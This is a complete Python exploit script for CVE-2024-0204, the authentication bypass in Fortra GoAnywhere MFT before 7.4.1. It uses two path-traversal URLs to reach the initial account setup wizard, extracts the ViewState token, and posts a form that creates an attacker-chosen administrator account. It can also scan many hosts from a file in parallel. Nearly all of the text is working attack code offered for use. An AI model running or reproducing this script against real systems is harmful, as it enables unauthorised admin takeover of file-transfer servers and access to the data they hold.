#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass # Date: 2025-05-25 # Exploit Author: @ibrahimsql # Exploit Author's github: https://github.com/ibrahimsql # Vendor Homepage: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft # Software Link: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft/free-trial # Version: < 7.4.1 # Tested on: Kali Linux 2024.1 # CVE: CVE-2024-0204 # Description: # Fortra GoAnywhere MFT versions prior to 7.4.1 contain a critical authentication bypass vulnerability # that allows unauthenticated attackers to create an administrator account by exploiting a path traversal # vulnerability to access the initial account setup wizard. This exploit demonstrates two different # path traversal techniques to maximize successful exploitation across various server configurations. # # References: # - https://old.rapid7.com/blog/post/2024/01/23/etr-cve-2024-0204-critical-authentication-bypass-in-fortra-goanywhere-mft/ # - https://www.tenable.com/blog/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-vulnerability # - https://nvd.nist.gov/vuln/detail/cve-2024-0204 import argparse import concurrent.futures import os import socket import sys from typing import List, Dict, Tuple, Optional, Union import requests from bs4 import BeautifulSoup from colorama import Fore, Style, init # Initialize colorama for cross-platform colored output init(autoreset=True) # Disable SSL warnings requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) # Constants DEFAULT_TIMEOUT = 10 MAX_THREADS = 10 USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" PRIMARY_EXPLOIT_PATH = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml" SECONDARY_EXPLOIT_PATH = "/goanywhere/..;/wizard/InitialAccountSetup.xhtml" class Banner: @staticmethod def show(): banner = f"""{Fore.CYAN} ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔═████╗╚════██╗██╔═████╗██║ ██║ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗██║██╔██║ █████╔╝██║██╔██║███████║ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝████╔╝██║██╔═══╝ ████╔╝██║╚════██║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ╚██████╔╝███████╗╚██████╔╝ ██║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═╝ {Style.RESET_ALL} {Fore.GREEN}CVE-2024-0204 Exploit v1.0{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql{Style.RESET_ALL} """ print(banner) class GoAnywhereExploit: def __init__(self, username: str, password: str, timeout: int = DEFAULT_TIMEOUT): self.username = username self.password = password self.timeout = timeout self.headers = {"User-Agent": USER_AGENT} self.vulnerable_targets = [] self.non_vulnerable_targets = [] self.error_targets = [] def check_target(self, target: str) -> Dict: """ Check if target is vulnerable to CVE-2024-0204 and attempt to create an admin account Args: target: The target URL/domain to check Returns: Dict containing result information """ result = { "target": target, "vulnerable": False, "message": "", "admin_created": False, "error": None } # Try primary exploit path first primary_result = self._try_exploit_path(target, PRIMARY_EXPLOIT_PATH) if primary_result["vulnerable"]: return primary_result # If primary path failed, try secondary exploit path print(f"{Fore.BLUE}[*] {Style.RESET_ALL}Primary exploit path failed, trying alternative path...") secondary_result = self._try_exploit_path(target, SECONDARY_EXPLOIT_PATH) if secondary_result["vulnerable"]: return secondary_result # If both paths failed, target is not vulnerable print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable to CVE-2024-0204") result["message"] = "Not vulnerable to CVE-2024-0204" self.non_vulnerable_targets.append(target) return result def _try_exploit_path(self, target: str, exploit_path: str) -> Dict: """ Try to exploit the target using a specific exploit path Args: target: Target to exploit exploit_path: Path to use for exploitation Returns: Dict with exploitation results """ result = { "target": target, "vulnerable": False, "message": "", "admin_created": False, "error": None } try: url = f"https://{target}{exploit_path}" session = requests.Session() # Initial check for vulnerability response = session.get( url, headers=self.headers, verify=False, timeout=self.timeout ) # Determine if target is vulnerable based on response if response.status_code == 401: print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable via {exploit_path} (401 Unauthorized)") result["message"] = "Not vulnerable (401 Unauthorized)" return result if response.status_code != 200: print(f"{Fore.YELLOW}[?] {Style.RESET_ALL}{target} - Unexpected response via {exploit_path} (Status: {response.status_code})") result["message"] = f"Unexpected response (Status: {response.status_code})" return result # Target is potentially vulnerable print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Potentially vulnerable via {exploit_path}!") result["vulnerable"] = True self.vulnerable_targets.append(target) # Extract ViewState token for the form submission try: soup = BeautifulSoup(response.text, "html.parser") view_state = soup.find('input', {'name': 'javax.faces.ViewState'}) if not view_state or not view_state.get('value'): print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Could not extract ViewState token via {exploit_path}") result["message"] = "Could not extract ViewState token" return result # Prepare data for admin account creation data = { "j_id_u:creteAdminGrid:username": self.username, "j_id_u:creteAdminGrid:password_hinput": self.password, "j_id_u:creteAdminGrid:password": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2", "j_id_u:creteAdminGrid:confirmPassword_hinput": self.password, "j_id_u:creteAdminGrid:confirmPassword": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2", "j_id_u:creteAdminGrid:submitButton": "", "createAdminForm_SUBMIT": 1, "javax.faces.ViewState": view_state['value'] } # Attempt to create admin account create_response = session.post( url, headers=self.headers, data=data, verify=False, timeout=self.timeout ) if create_response.status_code == 200: print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Admin account created successfully via {exploit_path}! Username: {self.username}, Password: {self.password}") result["admin_created"] = True result["message"] = f"Admin account created successfully! Username: {self.username}, Password: {self.password}" else: print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Failed to create admin account via {exploit_path} (Status: {create_response.status_code})") result["message"] = f"Failed to create admin account (Status: {create_response.status_code})" except Exception as e: print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error extracting form data: {str(e)}") result["message"] = f"Error extracting form data: {str(e)}" result["error"] = str(e) except requests.exceptions.ConnectTimeout: print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection timeout") result["message"] = "Connection timeout" result["error"] = "Connection timeout" self.error_targets.append(target) except requests.exceptions.ConnectionError: print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection error") result["message"] = "Connection error" result["error"] = "Connection error" self.error_targets.append(target) except Exception as e: print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error: {str(e)}") result["message"] = f"Error: {str(e)}" result["error"] = str(e) self.error_targets.append(target) return result def scan_targets(self, targets: List[str]) -> None: """ Scan multiple targets concurrently Args: targets: List of targets to scan """ with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: executor.map(self.check_target, targets) def load_targets_from_file(self, file_path: str) -> List[str]: """ Load targets from a file Args: file_path: Path to the file containing targets Returns: List of targets """ if not os.path.exists(file_path): print(f"{Fore.RED}[!] {Style.RESET_ALL}File not found: {file_path}") return [] try: with open(file_path, "r") as f: return [line.strip() for line in f if line.strip()] except Exception as e: print(f"{Fore.RED}[!] {Style.RESET_ALL}Error reading file: {str(e)}") return [] def print_summary(self) -> None: """Print a summary of the scanning results""" print(f"\n{Fore.CYAN}[*] {Style.RESET_ALL}Scan Summary:") print(f"{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets: {len(self.vulnerable_targets)}") print(f"{Fore.RED}[-] {Style.RESET_ALL}Non-vulnerable targets: {len(self.non_vulnerable_targets)}") print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}Error targets: {len(self.error_targets)}") if self.vulnerable_targets: print(f"\n{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets:") for target in self.vulnerable_targets: print(f" - {target}") def validate_args(args): """Validate command line arguments""" if not args.target and not args.file: print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify either a target (-t) or a file (-f)") return False if args.file and not os.path.exists(args.file): print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: File not found: {args.file}") return False if not args.username or not args.password: print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify both username (-u) and password (-p)") return False return True def main(): """Main function""" parser = argparse.ArgumentParser(description="CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Exploit") parser.add_argument('-t', '--target', help="Target host to check (e.g., 'example.com' or '192.168.1.1')") parser.add_argument('-f', '--file', help="File containing targets, one per line") parser.add_argument('-u', '--username', help="Username for the admin account to create") parser.add_argument('-p', '--password', help="Password for the admin account to create") parser.add_argument('--timeout', type=int, default=DEFAULT_TIMEOUT, help=f"Connection timeout in seconds (default: {DEFAULT_TIMEOUT})") parser.add_argument('--threads', type=int, default=MAX_THREADS, help=f"Number of concurrent threads for scanning (default: {MAX_THREADS})") args = parser.parse_args() # Show banner Banner.show() # Validate arguments if not validate_args(args): parser.print_help() sys.exit(1) # Initialize exploit exploit = GoAnywhereExploit( username=args.username, password=args.password, timeout=args.timeout ) # Handle single target if args.target: print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Checking single target: {args.target}") exploit.check_target(args.target) # Handle targets from file elif args.file: targets = exploit.load_targets_from_file(args.file) if not targets: print(f"{Fore.RED}[!] {Style.RESET_ALL}No valid targets found in the file") sys.exit(1) print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Loaded {len(targets)} targets from file") print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Starting scan with {args.threads} threads...\n") exploit.scan_targets(targets) # Print summary exploit.print_summary() if __name__ == "__main__": try: main() except KeyboardInterrupt: print(f"\n{Fore.YELLOW}[!] {Style.RESET_ALL}Scan interrupted by user") sys.exit(0) except Exception as e: print(f"{Fore.RED}[!] {Style.RESET_ALL}Unhandled error: {str(e)}") sys.exit(1)